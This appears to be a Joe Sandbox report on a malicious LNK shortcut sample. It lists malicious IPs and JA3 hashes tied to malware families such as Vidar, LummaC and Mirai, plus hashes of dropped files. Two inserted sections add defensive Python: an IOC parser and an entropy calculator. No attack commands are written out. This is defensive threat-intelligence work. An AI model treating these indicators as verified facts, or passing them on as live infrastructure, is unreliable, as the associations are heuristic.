                                          127.0.0.1
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1582715
                                          Start date and time:2024-12-31 10:37:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:GYede3Gwn0.lnk
                                          renamed because original name is a hash value
                                          Original Sample Name:560d5d5e43b6d2ac1bdfb3ca4156e6d7.lnk
                                          Detection:MAL
                                          Classification:mal100.evad.winLNK@28/62@2/2
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 10
                                          • Number of non-executed functions: 2
                                          Cookbook Comments:
                                          • Found application associated with file extension: .lnk
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 184.28.88.176, 162.159.61.3, 172.64.41.3, 3.233.129.217, 52.6.155.20, 3.219.243.226, 52.22.41.97, 2.23.197.184, 199.232.210.172, 2.16.168.107, 2.16.168.105, 13.107.246.45, 4.245.163.56, 23.47.168.24
                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target mshta.exe, PID 4372 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2100 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6892 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:37:57 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
04:38:02 | API Interceptor | 2x Sleep call for process: svchost.exe modified
04:38:03 | API Interceptor | 1x Sleep call for process: mshta.exe modified
04:38:04 | API Interceptor | 37x Sleep call for process: powershell.exe modified
04:38:16 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
                                          No context
Match: bg.microsoft.map.fastly.net
Associated Sample Name / URL | Detection | Threat Name | Context
Qu3ped8inH.exe | malicious | Unknown | 199.232.210.172
DIS_37745672.pdf | malicious | KnowBe4, PDFPhish | 199.232.214.172
https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 199.232.214.172
222.msi | malicious | XRed | 199.232.214.172
universityform.xlsm | malicious | Unknown | 199.232.210.172
universityform.xlsm | malicious | Unknown | 199.232.210.172
Payment-Order #24560274 for 8,380 USD.exe | malicious | AsyncRAT, PureLog Stealer, zgRAT | 199.232.214.172
SecuredOnedrive.ClientSetup.exe | malicious | ScreenConnect Tool | 199.232.214.172
dsoft.exe | malicious | Python Stealer, Creal Stealer | 199.232.210.172
Match: UKRTELNETUA
Associated Sample Name / URL | Detection | Threat Name | Context
botx.arm7.elf | malicious | Mirai | 92.112.91.88
db0fa4b8db0333367e9bda3ab68b8042.sh4.elf | malicious | Mirai, Gafgyt | 37.53.10.72
telnet.sh4.elf | malicious | Unknown | 46.200.20.158
Hh8hqqbu9X.exe | malicious | Lokibot | 92.113.16.67
x86.elf | malicious | Mirai, Moobot | 92.113.237.42
nsharm5.elf | malicious | Mirai | 37.53.5.183
HmP9fn8NM9.exe | malicious | Unknown | 92.113.16.201
arm5.nn-20241218-1651.elf | malicious | Mirai, Okiru | 94.178.159.232
arm.nn.elf | malicious | Mirai, Okiru | 94.178.39.247
jew.arm.elf | malicious | Unknown | 92.112.21.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 6684V5n83w.exe | malicious | Vidar | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | Bp4LoSXw83.lnk | malicious | Unknown | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | heteronymous.vbs | malicious | Remcos, GuLoader | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | re5.mp4.hta | malicious | LummaC | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Snake Keylogger, VIP Keylogger | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | Poket.mp4.hta | malicious | LummaC | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | Fizzy Loader.exe | malicious | Blank Grabber, Umbral Stealer | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | Epsilon.exe | malicious | Unknown | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | XClient.exe | malicious | XWorm | 92.113.18.193
3b5074b1b5d032e5620f69f9f700ff0e | hoEtvOOrYH.exe | malicious | SmokeLoader | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | 6684V5n83w.exe | malicious | Vidar | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | heteronymous.vbs | malicious | Remcos, GuLoader | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | zku4YyCG6L.exe | malicious | Unknown | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | hca5qDUYZH.exe | malicious | Unknown | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | Loader.exe | malicious | Meduza Stealer | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | BHgwhz3lGN.exe | malicious | Vidar | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | Open Purchase Order Summary Sheet.vbs | malicious | LodaRAT, XRed | 92.113.18.193
37f463bf4616ecd445d4a1937da06e19 | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 92.113.18.193
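The context tables above come out of text extraction with the table header collapsed into one string, the Match value (an ASN tag or a 32-hex JA3 hash) fused onto the first sample name of its group, the "Get hash" and "Browse" link captions fused into the cells, and the context IP on a bullet line after each row. The following added example, which is not part of the Joe Sandbox report and not Joe Security's code, parses rows in that shape into IOC records and pivots them by context IP. The sample input is a subset of rows copied from this report; the ASN split rule and the "three or more families" threshold are heuristics chosen here. The practical point it makes explicit: an IP such as 92.113.18.193 that shows up with Vidar, LummaC, XWorm, SmokeLoader, LodaRAT and others is a hosting or relay pivot shared by many operators, not evidence that this LNK sample and those samples share an operator.

```python
"""Parse the flattened context rows of a Joe Sandbox report and pivot by IP.

Added example; not part of the Joe Sandbox report and not Joe Security's code.
It assumes the row shape that the text extraction of this report shows: the
table header starts with "Match" and ends with "Context", the Match value is
fused onto the first sample name of its group (a 32-hex JA3 hash or an
uppercase ASN tag), the "Get hash" and "Browse" link captions are fused into
the cells, and each row is followed by a bullet line carrying the context IP.
The ASN split and the family-count threshold are heuristics chosen here.
"""
import re
from collections import defaultdict

JA3_RE = re.compile(r"^([0-9a-f]{32})(.+)$")
# Heuristic: an uppercase/digit run directly followed by a lowercase letter
# that starts the sample name, e.g. "UKRTELNETUAbotx.arm7.elf".
ASN_RE = re.compile(r"^([A-Z0-9]{3,})([a-z].*)$")
ROW_RE = re.compile(
    r"^(?P<name>.+?)Get hash"
    r"(?P<detection>malicious|suspicious|clean|unknown)"
    r"(?P<threat>.*?)Browse$"
)

# Constructed input: rows copied from the JA3 and ASN context tables of this
# report, exactly as the text extraction renders them (a subset of the rows).
SAMPLE_ROWS = """\
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
3b5074b1b5d032e5620f69f9f700ff0e6684V5n83w.exeGet hashmaliciousVidarBrowse
• 92.113.18.193
Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
• 92.113.18.193
heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
• 92.113.18.193
XClient.exeGet hashmaliciousXWormBrowse
• 92.113.18.193
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
UKRTELNETUAbotx.arm7.elfGet hashmaliciousMiraiBrowse
• 92.112.91.88
telnet.sh4.elfGet hashmaliciousUnknownBrowse
• 46.200.20.158
"""


def split_match(cell):
    """Split a Match value that extraction fused onto the first sample name."""
    for rx in (JA3_RE, ASN_RE):
        m = rx.match(cell)
        if m:
            return m.group(1), m.group(2)
    return None, cell


def parse_context(text):
    """Return one record per row: match, sample, detection, families, ip."""
    records, current_match, expect_match = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Match") and line.endswith("Context"):
            current_match, expect_match = None, True   # new table; next row carries Match
            continue
        if line.startswith("•"):                       # context IP belongs to the previous row
            if records:
                records[-1]["ip"] = line.lstrip("• ").strip()
            continue
        m = ROW_RE.match(line)
        if not m:
            continue
        name = m.group("name")
        if expect_match:
            current_match, name = split_match(name)
            expect_match = False
        families = [f.strip() for f in m.group("threat").split(",") if f.strip()]
        records.append({"match": current_match, "sample": name,
                        "detection": m.group("detection"),
                        "families": families, "ip": None})
    return records


def families_by_ip(records, ignore=("Unknown",)):
    """Distinct threat families seen per context IP, skipping unattributed rows."""
    pivot = defaultdict(set)
    for r in records:
        if r["ip"] is None:
            continue
        for fam in r["families"]:
            if fam not in ignore:
                pivot[r["ip"]].add(fam)
    return dict(pivot)


def shared_infrastructure(records, min_families=3):
    """IPs tied to at least min_families unrelated families. Treat such an IP as
    a hosting or relay pivot (many operators use it), not as evidence that the
    samples share an operator; the threshold is an arbitrary choice."""
    return sorted(ip for ip, fams in families_by_ip(records).items()
                  if len(fams) >= min_families)


if __name__ == "__main__":
    recs = parse_context(SAMPLE_ROWS)
    for ip, fams in sorted(families_by_ip(recs).items()):
        print(ip, sorted(fams))
    print("shared:", shared_infrastructure(recs))
```

Run against the full tables, the same pivot puts every JA3 row on 92.113.18.193 while the ASN rows spread across Ukrtelecom ranges; the former is what to block or alert on for this sample, the latter is only a reminder that the sample's infrastructure sits in consumer address space also used by Mirai variants.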
                                          No context
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.726333835586031
                                          Encrypted:false
                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0W:9JZj5MiKNnNhoxuf
                                          MD5:ADE5ACFA865375BA1C5E5F07535DE762
                                          SHA1:B57F978501E473403A0F95130074729C84DCF743
                                          SHA-256:2DE69FF7E8A3530DA5B86B8CD63684D4B38082CBA5D739511904B6A83AEE3B3B
                                          SHA-512:B5DBA001D97569B27394A97F144B9F442CE7C9E61A3F477F7208943DD969BDAB69D53383EB0DF91C7B3EFFE1DC8E05A5A84C55C035FCC15840642489FC90D1B6
                                          Malicious:false
                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x8c173f22, page size 16384, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.7556031420567035
                                          Encrypted:false
                                          SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                          MD5:47EF57947E59E90B5D53C8F3315B1A50
                                          SHA1:63F80EB780483A71D4C59D557ED6BE3F451ADF81
                                          SHA-256:D346181562400CB92ACBE8908E24CCF86D5E336874262D2462B5F5FFF4D7946A
                                          SHA-512:ACBC5FD07CBE37DB6D6577B09ED52F31DA43F6E7C6B14562DCC26D5FF9D8B9DED75886E833B5B8049AC558F124393F0512A517443317D3DCE8100C35AE399EA4
                                          Malicious:false
                                          Preview:..?"... .......7.......X\...;...{......................0.e......!...{?..&...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................H.\..&...|..................<.U.&...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.08017734003193144
                                          Encrypted:false
                                          SSDEEP:3:rlXKYeQRZc3NaAPaU1lgpSAlluxmO+l/SNxOf:xXKzmZENDPaUTAgmOH
                                          MD5:17611623C5952F51F5EBC4926AB5075E
                                          SHA1:A14118A0C3012AAE9EAB5C7989A769F8AE111E7C
                                          SHA-256:5DF074128271F19806703FA2FDC961F577E645A25EF99B72EA304A72108A24B1
                                          SHA-512:64086A0CAA36EDFBC12D085C12F4C70746D6C33931998CF98004AD9B9AF8D8494AC7D9A423FE020E5149958FF3EBA2179ACAED22C74A1E8483878C0EEC4C31D0
                                          Malicious:false
                                          Preview:..s.....................................;...{...&...|...!...{?..........!...{?..!...{?..g...!...{?..................<.U.&...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
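Each dropped-file entry carries an "Entropy (8bit)" figure next to its size and an "Encrypted" flag. The three svchost.exe entries above (the BITS queue database under C:\ProgramData\Microsoft\Network\Downloader\ and its 16 KiB ESE log page) score between 0.08 and 0.76 because they are almost entirely zero fill, while the DER certificate further down the list scores 7.7 without being malicious. The following added example, not part of the Joe Sandbox report and not Joe Security's code, computes that figure (Shannon entropy in bits per byte) and applies the kind of threshold such a column is used for. The thresholds are assumptions for illustration; the sandbox's own rule for its Encrypted flag is not stated on this page, and the inputs are constructed here rather than taken from the report.

```python
"""Shannon entropy per byte, the 'Entropy (8bit)' figure in the dropped-file
entries, plus the heuristic split between 'mostly empty', 'structured' and
'dense (packed or encrypted)' that such a column is typically used for.

Added example, not part of the Joe Sandbox report or of Joe Security's code.
The threshold values are assumptions chosen for illustration. The inputs are
constructed to mimic the kinds of files in the listing (a mostly zero 16 KiB
database log page, a uniform byte stream); they are not the report's files.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a single repeated value, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, sparse_threshold: float = 1.0,
             dense_threshold: float = 7.0) -> str:
    """Assumed thresholds (illustrative): below 1.0 bits/byte the file is mostly
    one value (a zero-filled database or log page); above 7.0 it is compressed,
    encrypted or otherwise dense. A DER certificate or a packed PE section
    also lands in the dense bucket, so high entropy alone is not an indicator
    of malice; it only says the bytes are worth a closer look."""
    h = shannon_entropy(data)
    if h < sparse_threshold:
        return "sparse"
    if h > dense_threshold:
        return "dense"
    return "structured"


# Constructed inputs, not the report's files.
def mostly_zero_page(size: int = 16384, header_bytes: int = 64) -> bytes:
    """A 16 KiB page with a short distinct header and zero fill, the shape of
    the small ESE log page that svchost.exe dropped next to qmgr.db."""
    return bytes(range(1, header_bytes + 1)) + b"\x00" * (size - header_bytes)


def uniform_stream(repeat: int = 64) -> bytes:
    """Every byte value equally often: the 8.0 ceiling."""
    return bytes(range(256)) * repeat


if __name__ == "__main__":
    for label, blob in [("zero page", mostly_zero_page()),
                        ("uniform", uniform_stream()),
                        ("64 symbols", bytes(range(64)) * 10)]:
        print(f"{label:10s} size={len(blob):6d} "
              f"entropy={shannon_entropy(blob):.4f} -> {classify(blob)}")
```

The 16 KiB constructed page lands near 0.06 bits per byte, in the same range as the 0.08 the report shows for the real log page; when the same computation is run over a dropped PE, a value close to 8.0 in a section that should hold code is the signal to check for a packer before trusting any static string or import results.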
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):298
                                          Entropy (8bit):5.179743957385337
                                          Encrypted:false
                                          SSDEEP:6:5SJLjyq2PN72nKuAl9OmbnIFUt8MSJug11Zmw+MSJugjRkwON72nKuAl9OmbjLJ:6yvVaHAahFUt8cgX/+cgjR5OaHAaSJ
                                          MD5:8B3BEBBD8BB3BDBB2F7ADCE71D73A2DA
                                          SHA1:634FF058A7590F121FD2ED8670D8D98A60B961A8
                                          SHA-256:CB38B74C52CC7A2DA44D56BD910FEE9562E2F53B500C38E76139528D05BB798A
                                          SHA-512:6D66E5E7B0FFACDB69D2B76FDA007BFAB32840A9BC6CD1F9DC39AEA38015A19DD53F15040F671C53E9CFB428FD6256BE424F310033CFE2028264EB4D302C69A8
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.199 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/31-04:38:08.201 1c74 Recovering log #3.2024/12/31-04:38:08.201 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):298
                                          Entropy (8bit):5.179743957385337
                                          Encrypted:false
                                          SSDEEP:6:5SJLjyq2PN72nKuAl9OmbnIFUt8MSJug11Zmw+MSJugjRkwON72nKuAl9OmbjLJ:6yvVaHAahFUt8cgX/+cgjR5OaHAaSJ
                                          MD5:8B3BEBBD8BB3BDBB2F7ADCE71D73A2DA
                                          SHA1:634FF058A7590F121FD2ED8670D8D98A60B961A8
                                          SHA-256:CB38B74C52CC7A2DA44D56BD910FEE9562E2F53B500C38E76139528D05BB798A
                                          SHA-512:6D66E5E7B0FFACDB69D2B76FDA007BFAB32840A9BC6CD1F9DC39AEA38015A19DD53F15040F671C53E9CFB428FD6256BE424F310033CFE2028264EB4D302C69A8
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.199 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/31-04:38:08.201 1c74 Recovering log #3.2024/12/31-04:38:08.201 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):342
                                          Entropy (8bit):5.175193705050396
                                          Encrypted:false
                                          SSDEEP:6:5SJB39+q2PN72nKuAl9Ombzo2jMGIFUt8MSJPEJZmw+MSJuGN9VkwON72nKuAl97:uN+vVaHAa8uFUt8Rm/+IG3V5OaHAa8RJ
                                          MD5:4DD8F1B899F67CD0657DA121BF4D10E7
                                          SHA1:3972256535A136C53ED70864F61C8A010C131686
                                          SHA-256:92B33CF57A3B67B663822D717ED56BEBA083A0FB1BD9263A57D2AFC0A28707B1
                                          SHA-512:76AB89FE44633B7D73A6BB65E314F705C4C0E72188537C17AACF48C6D674303734DCEF44C190F35741294616705FE9D8A1B2A80481B5A6E1BFB7569F61DDE5EC
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.257 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/31-04:38:08.258 1d2c Recovering log #3.2024/12/31-04:38:08.259 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):342
                                          Entropy (8bit):5.175193705050396
                                          Encrypted:false
                                          SSDEEP:6:5SJB39+q2PN72nKuAl9Ombzo2jMGIFUt8MSJPEJZmw+MSJuGN9VkwON72nKuAl97:uN+vVaHAa8uFUt8Rm/+IG3V5OaHAa8RJ
                                          MD5:4DD8F1B899F67CD0657DA121BF4D10E7
                                          SHA1:3972256535A136C53ED70864F61C8A010C131686
                                          SHA-256:92B33CF57A3B67B663822D717ED56BEBA083A0FB1BD9263A57D2AFC0A28707B1
                                          SHA-512:76AB89FE44633B7D73A6BB65E314F705C4C0E72188537C17AACF48C6D674303734DCEF44C190F35741294616705FE9D8A1B2A80481B5A6E1BFB7569F61DDE5EC
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.257 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/31-04:38:08.258 1d2c Recovering log #3.2024/12/31-04:38:08.259 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:modified
                                          Size (bytes):475
                                          Entropy (8bit):4.975824910517686
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq2SAxSmksBdOg2H0fcaq3QYiubcP7E4TX:Y2sRdspJxSmJdMHz3QYhbA7n7
                                          MD5:DF2F4AD335F6A08B95B1CC693B887E10
                                          SHA1:11C6AA9BF8FF2A5CE8FF8231A18AD033066706BB
                                          SHA-256:131ACA19463CC68BEC80E843C9AB4041D41F6EB35362D1E93CAC0A3FA2D228E8
                                          SHA-512:83FF6E2A02E8B6459031365355753DC52CC3E22F10D1740A98F51B0525772FAEFA82F82EC4914346CAE86BAAB4D95AC6B899D654887A5400483965DA6151A55E
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380197899957473","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":116620},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):475
                                          Entropy (8bit):4.971824627296864
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                          MD5:F326539D084B03D88254A74D6018F692
                                          SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                          SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                          SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):5449
                                          Entropy (8bit):5.248255747688015
                                          Encrypted:false
                                          SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7f8CNF:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhr
                                          MD5:DE35E3110FB8CB72550E6D99F260ACFE
                                          SHA1:8857CEA912A1E34A2BC9DE5C9D1531B88ECCE4ED
                                          SHA-256:09925E300767FE8D534D229639C023DC064AE36CDE0ED27E22658107221B7600
                                          SHA-512:4D9BFF2126D1F37C31E6DFBAD6AF3E55DAEA852C042DCBD74412F411D9636935C8AD6611AEBD0BEE78202A2462E32FBBFBBB8E8EB26EF8FFFD05221CE12ED00B
                                          Malicious:false
                                          Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
